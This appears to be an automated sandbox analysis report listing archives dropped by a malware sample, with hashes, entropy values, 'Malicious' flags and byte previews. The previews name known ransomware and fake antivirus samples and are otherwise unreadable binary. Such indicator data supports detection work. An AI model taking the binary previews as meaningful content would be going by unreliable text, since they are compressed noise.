                                                                                                                                                Preview:PK..3...c..L@....M....z......Endermanch@Movie.mpeg.exe......AE........b...../.....JXU....G.]8..Y..:...;..].d.*......w..cd..69E.H;..`L...,..B......&X.......s.K.T.......C_&..c.%.0._`..a..#....`..7:.Vm.k&6..|$.Q2SCah\r._...^L.$8r.:.r.!......g.l].....6.....,...M..my...~.#iF...6.d/..*.\..4(+ia...VSI>..........x..G.Y5..../..HR.......+.........."$....:.O.R..>.s......]~..T.g$.. ....,4..9..JQ.~.$..c.F.L......H....i.1....V.i.g...z.#.]..b.....@.f.....4OiI..B.O.....\....k../.Tz....M".d..U...jQ(....-.A.jA..s..4.......A`.L...r.\..7..V>......F.y.y....D..d...H[9.S..'.4C.#.gB..WP...U.)..f.$h...6@[.5j...84m.Fc4....><&..O}S.W....IB.o..b.^+W;V.l.x..S....g....a..Z.w..m .@)...-.&.w......mg=^.c.1.%<n.CU.......aN..r$. 7...._....0...D[Mr.9.}............+DB...t.9(@.>f......m.kO......e.|.f.W......:.9?zL.Rb....,...bU.)Q.R....(%..."..3)3....N...M.0.m....sPPt$...`...E.......E.B.....:.....R.........1_qar..y..?..(..A>.....%.......;..fW.V.E.2.+.r.s.?.r.W...@.I.
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):9761692
                                                                                                                                                Entropy (8bit):7.999976737620723
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:196608:RIqrrCcUdFJp1YNYbsVNCpsF98DOV9Qz7FFEClC6j2LzfFXkoZc1kXa:FCcUdFX5gNL8oQz7FFECl3j2ffF0L1Ua
                                                                                                                                                MD5:B05E1B131299F3D57323BDCA54B00570
                                                                                                                                                SHA1:82EBEB46687E7B285F588C056E52CCAAB87E464D
                                                                                                                                                SHA-256:3ADB8147E461A11ADD25101D78205B61B54B6993022C8014B9A55B3197CA39C9
                                                                                                                                                SHA-512:35580E1580CC2DC5A50AFDB1E3453517FA3955F7737C177A83BF2BBB9D000A7A5F060B032200E0440C4478400AC8B1788E018FC7C88ED150B96282146E2F2457
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK........F..H..............Endermanch@NavaShield.exe.m.."Q;~&.,.....y...[...W<....n&S28$.L2...c..k.Z.:._ .}..l....O....R(..Q:L....re..o...S...q........1.......Q........%.e..g0....n..H{.o.A...~.(.tV#..v..}Sz......e...a.AS. ..x......EX%BT...)......D.|>A....Je.Q`[+.g.;.o.Kw.k.......V....ObC9.v*`....E..-.GwX7..6...j.*gd...@S..E;.O......k..o...m.C&.[..H.s.}%@...........dGG..<.-.<rGTo.....-...L}....W...:.gq......w.9..U..<....'..8NY.?...R.H.AN8j....e.].....c.j...g....ZWk.0.ny.6...n...B..j.^.g..4..6..R.<0[.bN...$..`..d.R.9.l.).f.K.0.d.Y..R..../.F..y.:.A.%...FaC.{...n...w..BZws.................%<.p......'@.Tavg.1...<.(.cFE.I..:.5..._.j'O..%.5q...../<$z.~...|inI....f.~^.<(..D.;x...&.r..)O...\....!..E...`C.s..-?.../..w.d.|7....,.<p.|.f.....s.T....-...{.H`....6.eE..d.WR&..p.".....K.fKG.m.a...........TV[..`..a......6.jl.3D!W..M.[..d<..k.y.... .i.|8.v"..Ka......'.@...%...d...M".....9......l/=.6..I...pv.a..f...\..F.-z.B...*bJK.W.i.H...) .4.P@...G...*..p..jRk.y.
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):938498
                                                                                                                                                Entropy (8bit):7.999770835729866
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:+FhIdZxByAl+XiqNk6n3DaeCTLD1yilc7KrBVw1lFVFDqE/zQRsAOfySS:AhAgo2ikhryLD1hcerklFVhqEMiAuySS
                                                                                                                                                MD5:F315E49D46914E3989A160BBCFC5DE85
                                                                                                                                                SHA1:99654BFEAAD090D95DEEF3A2E9D5D021D2DC5F63
                                                                                                                                                SHA-256:5CBB6442C47708558DA29588E0D8EF0B34C4716BE4A47E7C715EA844FBCF60D7
                                                                                                                                                SHA-512:224747B15D0713AFCB2641F8F3AA1687516D42E045D456B3ED096A42757A6C10C6626672366C9B632349CF6FFE41011724E6F4B684837DE9B719D0F351DFD22E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK...........J.i..FQ..........Endermanch@NoMoreRansom.exe.&P....\..J..vt.D('..i...!.}..V./.d..i...^..j...V.......dk?..o#....}.6.F.......IZ+.~.H.l.o.....z...r..TJ.^.1.7..b&B.@.C.....)...34]...~...m..Y...}...P.r...>.z.....".4T.>.........\..?..E...z....G...u..4...;"..;8.|.....*...Z.k.4....G.V..x.Si.%...K..Q.6.......+Y.?...m......{,l...Xe....C/W..$...j.,(....4a .1.'..f...3lG8.{..z........H]..N8.H...%g.....V.`.y..f..Y...Q.l....=*....p....x.o.".M%...L.fc......Z..".C.`.oU.......e.......S.G.n....L.j@..Y....^......E$..l.$...&......4...h...x.9U....d..9..-i.zt7.>....hJz...=.......p..1AEd....O..y....m..6.[.8 3..u..q[.i.K..d.a...H4*.]....#[.....=.....y.Y9......K_L4.7.....Y.@..}.T../.B.G.&`.......s.,.iQ.P}..O'~..5e...L..~......x'M..l.<.x.s}|....Jq.........Sv%.M.Q.!?....L....^24<..eP]..*.crf.&.....J.o..;.w(..5]..>.Wc x...R......J.X.>.XTU....".....p...[..v.E...V....~.....<...K........Lfm`..3M?....G.....J5.d..~...a.#...1......i.@6..?.c+.....?r'K..0.~...L.s.[
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):808324
                                                                                                                                                Entropy (8bit):7.999786964776398
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:btiUqYRf3p96/VG8K8LtegdCDUcbdbbUJ9rV:btipYF3JategwDU029rV
                                                                                                                                                MD5:CAD618323B07C0F4F6273AE08DF1779E
                                                                                                                                                SHA1:E67715F81F83CE7CDA32F12A116CC950B6FD0DAC
                                                                                                                                                SHA-256:854113F2737EE276BA34FAC399E8A615E4DE4C712DD7A761AB0E198FA09D87FC
                                                                                                                                                SHA-512:EFD9403706ACCFE996B5DF58300B5E0A0B461727BDF7C5492E9914369FEF09AE06CDC2D00D30AC6D494FC68DADCF423D800741F7C22D5C1D565EF3FC675C4565
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..........'=..h].T...r......Endermanch@PCDefenderv2.msiq...AQ..).&...6..!....FH...v.....o...M:......G.d>o'.W.i..d.....u.\....{.A......C..j..7..S:...P..'..+'. .5...I.W.[...m_O....=1*..Z..Sa..A.....K.4.......k[G..y..how..n....D.xN......Lr3U2.G..k6).=.3.0.{...i....u.{..........JOwA....RYib.CM.%..R.K^.P.$i{NO..C@X...t..Y'}.<.....q. .n.....*x0..)..*..u.l|.T."..j.E%.ffarZ...v...W!..Pp....~'.B...No.Z."..l?..g..'..rZtB....L..L......@.N..'t..81:...'......m.N..;...);....Y.{nV......g|P..}..g../.9.va?iM]"..a..'+.j.D.?u.}..8..3....v....F.;..'..-G.t(.W..uC...4.....Q0..d../.....j,$.V.....8v....pbR..G..w.....{..'...\[-.....-..Q.Y.U\.+.W.G.........<ce.O.b$M...&..d..z...8.-..o.r..Q...., .C.e.k...b..`$)]w-.l]....h.......U.....2..+...........@..D9..U....,..I.0.......b.|.}..@..bP\H3.z.....4<.{.].F....:BR ur..>....B{..K.,0v..p.....i.9........%+.M;$...H.........y..rvq.2.Sj...I.....W...Z8..0wU.z...0.Mb=.r....U=....)..0..f.]J...`_..I1.}...`....#p.h.8hs.8...n\..
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):857943
                                                                                                                                                Entropy (8bit):7.9998266762101435
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:8PihE4O3RN9DzQwHCP1cxm6JmZ/T/Jybru:sihc3RrDzJCP1ISZ/FKy
                                                                                                                                                MD5:C2C0E8A4B2790140EA1AAE223669C48F
                                                                                                                                                SHA1:664A18B5DB524FAD9E43DF2B9C3C0577562082A7
                                                                                                                                                SHA-256:B23ECCB36868753A1131A9A6B88B33324B3CDD7E232FB80CB5DF4E2994F5A9E6
                                                                                                                                                SHA-512:DF22757F866564887154C54A053F919F03A27CED1446B95979B02B8960EC499167F6E9C3A1F76E8359AD044C8A5ED2C6ADDC4874A712F75726A24D3029A8587E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK.........nv<.e..............Endermanch@PCDefender.exe.?.....r...o......4...I...0.]...u9...\.....sN.DK@../...a~[.%.@..n....}..7......t...;..0=....|.t.......l....8..!.W.....#.q*B...{..S.,.y.......,...2v..A%x..<..{.nQ....S>.B........$.b(H9.H...BI.u...b.r[k.4..0..Y.......'.I..B.<.-p.E./j.%LE.0a......Q.M.g.{.F.k-.O..F.[...(B.yx^......f]'.jg.R.O..G...5A.&/.{XC...B+?..E.r..=.rX.n 7...y.]n1.2..;2....l..q..;....iR.0Z..0|.j..<w*.k.S...:..(E..3...3..3..ua.y&.kJ.9;P...Q..K..|..l?.c5E.+qm.I."..'*.<.i...d.0B....c.Y.e@.Z.......B.`^.....t...;.S..(...(....un...su..BSg...O...+P.pf..=j0q.Y...5..i.UY.Q..V......A..v..F.#F.I*./.....Mbn...J..?x..R.d`.:........OQ....9..}.'v.L..>..0..+...b.e.1..w....i..S.l.....((C..%R.f...r..h.0 .]..=i~N..jw...I.....z.=..u.tlnW...<./......1O"n..2|.zE.F.C...Ah.8'..|.h..^.F.h.H...h..?.1.....t.D=xEo.6.580>..Z2..j.w.......D...o#bh..(.....#.S........n.@^m.#../.p.~d..c.J..=.<Et....n...%........XeO.Z}...]%.K.........8xk`.CmIV.
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):131293
                                                                                                                                                Entropy (8bit):7.998685171989688
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3072:7P2YmowJWNmYv5lnTc8R+igbpBgBXtzXW4Dg/PJLDEuUYBAald:r2YnzNmYBlI8hgdBgBXpXxDg/PJLDEH4
                                                                                                                                                MD5:1559522C34054E5144FE68EE98C29E61
                                                                                                                                                SHA1:FF80EEB6BCF4498C9FF38C252BE2726E65C10C34
                                                                                                                                                SHA-256:E99651AA5C5DCF9128ADC8DA685F1295B959F640A173098D07018B030D529509
                                                                                                                                                SHA-512:6DAB1F391AB1BEA12B799FCFB56D70CFBDBDE05AD350B53FCB782418495FAD1C275FE1A40F9EDD238473C3D532B4D87948BDDD140E5912F14AFF4293BE6E4B4C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK.........t.I.w.H+...........Endermanch@Petya.A.exe.i?mj.P.........N.d|....>.c.....%..N.....I....7{.F.O...2.wT:..g...dg...{._:....`.....L...jR.0.d,...5..!....*u6...N.n8..R..{.d...|.{.........[.....y.f..!.f.A.........nl...}...@.....X....6.....7...o...(:\....D.N5.h.Y...78&...U....EA......A.5l...[......_6'..F$...[.~qut...X>1n..4.S...~.[._|/..n...#....j5......N...Y{WwD..%s.Vo....T7Wn.jIRq].*!..Ky...la.-^.}..j.s^^s..._.....r.E.........9E%NK?..%.....IGf.y.....<Ok.E._(.sW.G..O.%.)`.Iam..b.j.l.g..~.W....|...c.L.....k0...a...`.q.sls...........1.p.....^....TRq}..0?...:..VU...#a..+.1f...9(....0.+\}.j..~.0.#.De..mk.$......X..1.......p....q&.._.<.j..e..6/,..D.G....c..v......47..jd...q.....eb.z.........x.W.h.M...M.8.x;....<$StHq....k..AP7...k...........X.5m..O.%S.Y....?m.6.J.#...7s..=.4.*....p^g.A..y......3P;.=C.mc.id.n$..D..np..f......_nQ.W.J..+.a.....s.l...;@.2.,B-|W..,.......U.r..n..WB...2..@SE=..A...V.& F.wy6.q....O$...z=6..*.....+nD#....i.C|f.-...~^?...
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):133759
                                                                                                                                                Entropy (8bit):7.9985193464243505
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3072:veAhzA234eL3kq97n2PxqzYwiYjeKPdwekrkb:veEhJ1keyKPz
                                                                                                                                                MD5:7A5AB2552C085F01A4D3C5F9D7718B99
                                                                                                                                                SHA1:E148CA4CCE695C19585B7815936F8E05BE22EB77
                                                                                                                                                SHA-256:ED8D4BB55444595FABB8172EE24FA2707AB401324F6F4D6B30A3CF04A51212D4
                                                                                                                                                SHA-512:33A0FE5830E669D9FAFBC6DBE1C8D1BD13730552FBA5798530EEB652BB37DCBC614555187E2CFD055F3520E5265FC4B1409DE88DCCD4BA9FE1E12D3C793EF632
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..........yE4C.......p......Endermanch@PolyRansom.exeX.......%Q.......C.....]V.\.....#.X...z..K.'.uK..7..Gd%._u.G5..0..).Nz.h.....%._..TE....)..H....X.b.(.%]]D..."..0.|5..).G.-h'q.:...}b.1...:.^..d.d.t...9...iY+.....f...!.fn.sk..UG(......b..Rn_`....l....7W!...P.n{.....F...`C.'.....N...i.a..kD*V.XH......2....#...t.p.=..v.ykKDF..>..d.....4=.<.1..k.a...W..V:....m.1..g...U....l.s......../...3a.*.....TRG..N... ..Bm3.!.k.m.!..RIrjR;.^.n.....#.sW..lP4..!F...MR1..W.....u...@ ....#..[J{..U.....a6.fL.......HU...v-..<.HU ...jy.;..=........<._3..GP .%..(....K...s..%.....s.. .....Vb.N,.<.... v.(WM...j6.5.N..m....XzTm...$......[W..%!WY_......QAp..Y...#.3G.....b5...>......&.2.....&.QS.w.D.`...PF[.!.. ...h....-...`..?N........z...%.|..nD,VdW*d7....XC.(l.....+..0Z`................Ug..(..4.4...s.Zh.m._I!.f.6.|...-..aB..~iid"o. ...c..N.)..y....x..H....#|5.N...N..r..h..-c...>&v..d~e..9.A..(...2.6.?...;....D....-..w..~V..........U......$..[.(o*..........T.
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1070715
                                                                                                                                                Entropy (8bit):7.999811036564782
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:8Ssy3ly84sw+6ZL/8Hexx58oBiNkNHaIW:8Svy/D8Hexx0Nk9K
                                                                                                                                                MD5:7958E5251E5E6F9C3B7752FF1543E28A
                                                                                                                                                SHA1:86F6A8439CE6A6B30E6347C5BDE7E091E5FAD0AC
                                                                                                                                                SHA-256:B31C3F9D08337314050552A7DFDCEAF42BB6D22BAEE287CDE6238A6D965D87CD
                                                                                                                                                SHA-512:AEC50B136792AEBBD5AA8E5D316C39B728FF28E411DD54DB99A18D5C7B9447F25629C4220800EE8DD8CD2B24A98A11D46F32B45A62BDA5135C2FF0A731E032EE
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..3...c..aUM.....U..p.......Endermanch@RegistrySmart.exe......AE....!.J|..L.6..X. ."/,k.p.\9|....5~.....*0....:l....s].O.=w...S..[...).P4.....8....G..^.kFb..].]..u..5..<m./,v.3....e.U../k.i...0..4....&.......... ......`..tu..a......]K.0...A,.#sz!.cA....<>qq@9....P.X..........xX_...M...OE...y#MC;.!k@.r..Z}......c..ml...gd.-. n.`..v.Y.'..K.%:...?....*G..r...Tf..;....... eb.Y.J..........&V.E"A..[7.-....eo....P..7.h..gn..E...Sz......'ndO./.?..Z..o%u....y\..>.K...... @..0.^?e.jO.vdj..B..|.I.E.,TX.W....x.y........%.....E.....&..8..J.<.U.:..I.....o......{..3.V..Zx!.o._Jo.}..a..F8....k......3^.-....J.|A1....B........2...........js..8..|['.>....Sz.M...?.....@..Jl\<..@jme_..T..b..0....] .y.j.d....h.....Y....*.7.$,.............I.7+;..[V.....P.......z..93Ql`.ynC.G?..?..gd..HJ...4.ot.y ....U..PT@.0.7...g .q.@z...R.n.;..G.,t..V.....~.s1#.6Y=..8.......=.......3.#.m..q.Z$.3Dr<..i..$.k..z.t..=5...R}*...q8.l...0..).&.j.2IU.^d..zsX......@P.C...B..Y'...(.>..._.`..:..
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2265879
                                                                                                                                                Entropy (8bit):7.999920263279079
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:aipCYzu1VcZeM5OyrAh6wXiBqOX0aawWqjPrQZRD9qgUBZZmpUVt:aae1eAh6aYjPrc9q9rZwU
                                                                                                                                                MD5:5027CF25B38424D573321079BF190B0C
                                                                                                                                                SHA1:A9E02136626B18D7785050A89DEE00A328BEF946
                                                                                                                                                SHA-256:1CE3143DC4DAC71824B70DE90C3DB942C9DA15D450A4912871ADE10076CD1E8E
                                                                                                                                                SHA-512:4B1E16E85CB0522346238B39124DDFF074280CED6AAF6E11937458F7309ED366DEB1267D8A24AE4D6B6A540325BE93DF31DE55F62E4892F1E5740B8A932FF32E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..3...c.f..C....Q."..v&.....Endermanch@SE2011.exe......AE.../4..Sr...(...D.>n.\....U.mJ..|?....#...Ya....5.)..#<.$.IQY..Un..*. C.v..!F.^..K...Vy*.i?"`.....>....U...#.b.Z.v.....%..6.....7..&..&.J.1.>l.1.s].K.......~.9.2.L....N.._._.^...3....e.:.V-..Qk..rZ]T..Z.#.!e...W.+_.E1.#.vT.\.O]{.&.4...k...(.#u..q.v8.:...wa.{.e......w.......h..q7<M...21vu..1..`./...c.....D.V..?j.E......lX0E0..OT..N...%.._.06UP.#..h!...Mn.....G.f.1............z.N..,%0.{m.Y..aC.....e.I.\.2...T$..c..!..)n..9.I.:N54.s..{.k.8...[......c......rd.Sg.e....P...o:......X.'C.........r.[..A../.....). .W.8)H...xK.;.@.6....$.8A.WM....7i.F8...f...nv,.,.d..XJ.x..'.<B.d..~D.......c..i...F@..h\...K...+..:.....yO......Y.q}.#..Y..YE.L..>a..u#..#G.(:...@.c.s..>...-....[.V..V.0.z...XT..a..b....C..us..D...R.........~.....G..!..p`8)/..1h^m.......q@.:..^.....!...Y.T.!.;..+..=.+......v.v...u....?.$.E..9...E.b.\Z.-.l%0...K.~..&C.j.1G...[.Rz.C.N...p...S....d.....8.w-.6/.......,w..g..
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):904153
                                                                                                                                                Entropy (8bit):7.999807302196412
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:+EH0fyd4HKpzkOSWV6Lgn+DRGEZGXDyg+6:DRd4qpIOSWVYg+DUNzL
                                                                                                                                                MD5:32E630865A498A6FE5BF4D8DD593DCCD
                                                                                                                                                SHA1:05217C896A53C77C7F751DE72875A7315232C293
                                                                                                                                                SHA-256:62243C2840D5FBEEF1CCE73DBE4929727AFE174968B91FABA3848B89AB550D7F
                                                                                                                                                SHA-512:BAA4BA5E61406848BCD2683FBD8D480C0AB22954AF9B9933284DFC4FB2E9361FE0244EFAE3CE9D171B5510B8030BB510FE788D8AE3FE476B29FC8CEA815AC244
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK........PD.E./%......"......Endermanch@SecurityCentral.exe..9....(....I.;x.xK...v..0.k=...;...eWw6....K.X.PV.^.&b...IL.1.....0O j*.I...n....y..b.,...x-...Q..8......(.p2..'.z..M.f(..R(.t.W) #.......}...5..K....Qg.....{..X.JD..y.D..).\....T.....H.d.I.Pz.M.\.h}.c....(Q0DD..l.&..5.a.._.Y....!..2$..]....I2../6....}.u.....A..q.H.t.u.....t.H...FS..a.>...g.|.z._,.IEtk..7$A...Sj.'.K.:.H....z.`..R.M4.O"..b. \...M....u..ljaESi).m.b)....g..RSS..\E..D.......4..L.1...g....1.%...J..s).........ST..IX.....c.0...=..8c.X....W.yn...n....[1......W2.L......B..._.d..Y.>........`......"....-.eD..:dM...p'._2*8.H...R..y?...G..^....4..eb....H%...>...A......8.....`..T.$..;.c.c..7.T..7.1...M:.7>....}..@..H....}V+.V,Z..=>.f@..-.&.M.....^Gy......q>..|6V<...Pe..o.w.3..H.GP......Q.*.....0..Ts.....&..)F...HT.,~....tLi...m...6.>....RB...mt.ma......01..kZ..6~..!...^./3.7g..3bV(..4......SU..?..$U..kV#L..bl....P.....,u.X.A.-.Y.Y....%|..e.r..>._X...edE....('. .,........ .~
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):470947
                                                                                                                                                Entropy (8bit):7.999621239588262
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:43DuMOagxhLiZEfyNX/rFLzXqBaW71tc99onYZ:vog/LiZdX/p3icXon2
                                                                                                                                                MD5:1E23B530FEFBF0E4C6696CE8A0874081
                                                                                                                                                SHA1:585AE1E314118BD4CBF15D2A66A6B708D2E46735
                                                                                                                                                SHA-256:5DAF5731D28583A37A7D574D1D32CA89E2ED2DCC448CF0EBCDC6D43BC4981A92
                                                                                                                                                SHA-512:2312469EB3FB93F311BF28C14D2F5AD39E3DDD3AD4AA19306F8B276D4F401972FDC5E7659F388C08DACD739A8162B05D06E052F4342EDF1C1DD9AECDC32560F0
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK.........0G.w......2.."...Endermanch@SecurityDefener2015.exe....H..[.R..U..rP.&........3.....95...Vv...$.Z.{...$..(#}...}Y%.....*.....5b../y...V..K.\K+..P..@.....[...kAg....Vtv6.....@..M.cI..'.f.HJ.x..v...@C.....z.. .].P.^..Fy.......&Q..h....0~..I..+jI../B..t..&|..M...F.....j..l..*....Y......Bo.......8.P.A...a.M.~):a. ..6....R..l`=.m.b.......V..qxo....y.I..bo`]..P..$.'...Gs.i..FE... .8n.F.F....I..'..(p.;F:..yM"n...PP.P....m...K...../.[R.....ctF.P.5j........f........6sSi.G..'.*Ba.iQ.4J.V..abt.9.}.:.....!....w7.c\..=..%!..dni(G!X0.....G0..)..Qu".....w....kpH..?...YA....l..0@*].W...u...L.....$...j..$..../..=S7...\.0.o....1_....1.......?V$....,.e..c.-.. ..."..5.G..s.duP.8\.r ....@^..X_S..r..>3.0...M.O......Q...4...p$.....m....qh...)Q)..s.....N..N.[z.Rh....A....~.=U.3?._g.W...yyG.EN.r.u.B...b: ...5...:.|..D...Q...."11.{4.gv.w\[o..6.$Q...[+S..gx..}.2..OJ.....:.a..zT.....0..).!z.Q....e..f=.F..M.V.[X.....#T...S.#..Ad(A.y.<(..........z..s...%|c..
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1423299
                                                                                                                                                Entropy (8bit):7.9998682090292
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:Ca/D9aMH95/yTCjrz6oOzj0afgIN5j6sXTRzdi9IR7749FJsNk+:dL91Hb/lGVzN1Tfss3
                                                                                                                                                MD5:F0C0F92E6D444F8D3C60A0B49F642462
                                                                                                                                                SHA1:30B844E8D96B5B9866E01A6F74C8AC4EDAF75878
                                                                                                                                                SHA-256:E74925BD172FD72370CA7CCC5C48294E83C56DBC7A9C2EF33C2AC22E19803758
                                                                                                                                                SHA-512:697C5CAB839DC260CDA851D1D164555CC723449AB00B66EBB34EAA9A91C686424B5042A303CBE500208C34FD7C96C876D7E92506FA36A9CBFF0A9037DD1BFF6C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK...........C..s|............Endermanch@SecurityDefender.exe.hc\.=.cG......K .-uHb..gkJwu9[....$6!I.X.Sg[.$j...Q&...O.Q}..........N9.J!.!..R..Yl#..4.....5..>.....$.=[.fJ"....T_..JB.5a:D......U......x..]30?.......&. ...1.$...P....F..A.$...$......!..z.P...J...g....X.....#.^j..1.....CW.l*"]"....E.}..............p.x.....4}....Lfo:;..n..H..n..y7.G..w.b........W.0.......|...Z..~.,A=.$.(/}.e.g...`..p]......Ry~KOL...u.....h@.{..Qm....6,..".Y.'..-...5)1...N.'...f.....'........1..<3.....x.Pw;q.@X.,..xR..^.......%..V............@..q(..=...{.[!..h.!~.X.....K....y..9.9.4.[$g..{.JC..a|.O+..h.!..%....*.1H.....}..#.............oceg..._. %...>..."..7d.<.vP...5..%.U..)...Nu.Zp.....|.KK...D.K.2.....N...u..d_..4..A...&..........dh;..j?.B..H.J...v.....L.t.....}....*W..s79..kd...3q...p..!}..d..M{m..Vn..N..0..r...)'.....t..5.dW......v.0...b.O..U`.d`...~...LXY.;..IM... ....r.{)r<xj4..x..T_..."g..(......6|.v..%....?..q.$?q..q.......'~5......P...%.6.A"s..Ed@.
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2284722
                                                                                                                                                Entropy (8bit):7.99992877602736
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:4NsjK2ZkFtT1ZuqgtHjs7Rl7ld4PLYqtng/9umtpQ42IC:4SjKl3u1tDs7S8kO9umt6uC
                                                                                                                                                MD5:D49202312C94A40ACE73D0BC16C7D213
                                                                                                                                                SHA1:82CC7B285F150E5A4F88B103BCD2D3B1E66CA6D9
                                                                                                                                                SHA-256:6B172714B9C3DA500DA1C92971C9A1C4A5A8742FDF5DD62BD1A5587740FEFB22
                                                                                                                                                SHA-512:FC451E431EFCDBEAACA725AF97079DF9E467ADEC3FDC4E3B75C9D80EE6810B6EC595C15F331DC339E7BF486656E5EF8E6A21478E48AB5038C7B04189A6A1F973
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK.........4>w.\..."...#.....Endermanch@SecurityScanner.exe .r.6..2..N.p.1..Pm. ....1w.......*..7..t].U.Vf....u..t.v...*.)xO.;...`..&.v..Dd.......i...8n.v...^...G...../.e..jV'5>.N.Y.....w.3..'...{...o./H...^..6..'C.....z..g.b.K..L.?4..e...P.3...#..u..h&z..:.3. x....#...n.u=E.l......K*\z..e.7cY..Q...8....i.,v..k.K.vL/......=.E..g...........}..u....RP.!...e........$..E...J.........+..)s._.Y.. ....k.*!o.s.b.G....Ao.TQ...t1.]..1:;.......R..P..{0S.=..%.h.. ..Lh...NHN...U......-..BR/.~]..........d."V..?.ET].&i+..I|..f...Q.(..7T]....f<.r.........x.11...@.......>.\P..m.)....D.......Hy..}4...R..oh....G.,....b.s..tB.....5P.A..E....:a....X.....z8.7...9O.\eT..p1.@O...l..r...1.yI...m>\V.'...*&.0......S3.o..U..N..J...wTI..%..).s..R...`.....M...RH=.=J.E....|..`..U.mN..|q.7..t.)b..7."V..g....6.E.....+....P....3.P.0.|.....=>..q.C...l.2..K...../+.......=]..L.........^.|.f...SS.=.k>..z..,l.$'.D...0I.s&iJ..,.WD".....}.bK]u..4.q..(..e.C^.hA!{....F/...+.
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):385789
                                                                                                                                                Entropy (8bit):7.999536313248271
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:MdZTQDqwhWbeXTbAf4KINkYLcwpO/ZuY2EwbJ2Fgzz+n6tBN+Pz9BQBa4oQRMgs:yZw1DbAf4KIqM4cewFQ2z+6XNk3QVRM5
                                                                                                                                                MD5:541D8406002AA2750A2CF59480E71D94
                                                                                                                                                SHA1:AC40C4715CCA6967E2AF789CEE246B5A0D533A9F
                                                                                                                                                SHA-256:DDF1B79F563D94BB3DDB46B37AA010D95403DC7A1DEBFC9476A8AB449472B738
                                                                                                                                                SHA-512:9D3F5FD405BE3A76B9D0150E58A2AF24CD609A1B7B63BAC9E68350A0B153A42BF4941C5D2D8D752EE5D9D6DCC690250811A9C688E2EFCC458ABEF71580ADD73B
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
